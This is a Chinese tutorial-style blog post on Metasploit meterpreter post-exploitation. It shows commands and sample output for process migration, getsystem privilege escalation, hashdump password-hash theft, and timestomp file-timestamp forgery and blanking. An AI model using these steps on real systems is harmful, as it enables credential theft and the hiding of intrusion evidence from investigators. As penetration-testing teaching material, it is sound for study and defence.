java中的接口是类吗
383
2022-10-02
Metasploit之——高级后渗透模块(metasploit常用漏洞)
1.迁移到更安全的进程
migrate [要迁移到的进程id]
2.获取系统级权限
getsystem
注:getsystem模块在比较新的Windows系统中不太稳定,最好使用本地的提升权限方法和模块来提升控制权限。
meterpreter > getsystem...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
3.获取密码的哈希值
run hashdump
获取了目标的系统级管理权限后,就可以使用hashdump命令获取被渗透系统上登录密码的哈希值。
4.修改文件的访问时间、修改时间和创建时间
这里用到的命令是timestomp
4-1.查看文件的时间信息
timestomp -v [目标文件]meterpreter > timestomp -v e:\test.txt[*] Showing MACE attributes for e:test.txtModified : 2019-01-25 10:24:42 +0800Accessed : 2019-01-25 11:20:58 +0800Created : 2019-01-25 10:23:22 +0800Entry Modified: 2019-01-25 10:24:42 +0800
4-2.修改文件的时间信息
timestomp -z [时间信息] [目标文件]
此时的时间信息格式为:MM/DD/YYYY HH24:MI:SS
meterpreter > timestomp -v e:\test.txt[*] Showing MACE attributes for e:test.txtModified : 2019-01-25 10:24:42 +0800Accessed : 2019-01-25 11:20:58 +0800Created : 2019-01-25 10:23:22 +0800Entry Modified: 2019-01-25 10:24:42 +0800meterpreter > meterpreter > timestomp -z "01/25/2019 11:00:00" e:\test.txt[*] Setting specific MACE attributes on e:test.txtmeterpreter > timestomp -v e:\test.txt[*] Showing MACE attributes for e:test.txtModified : 2019-01-25 11:00:00 +0800Accessed : 2019-01-25 11:26:29 +0800Created : 2019-01-25 11:00:00 +0800Entry Modified: 2019-01-25 11:00:00 +0800
4-3.清空时间信息
timestomp -b [目标文件]meterpreter > timestomp -b e:\test.txt[*] Blanking file MACE attributes on e:test.txt
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~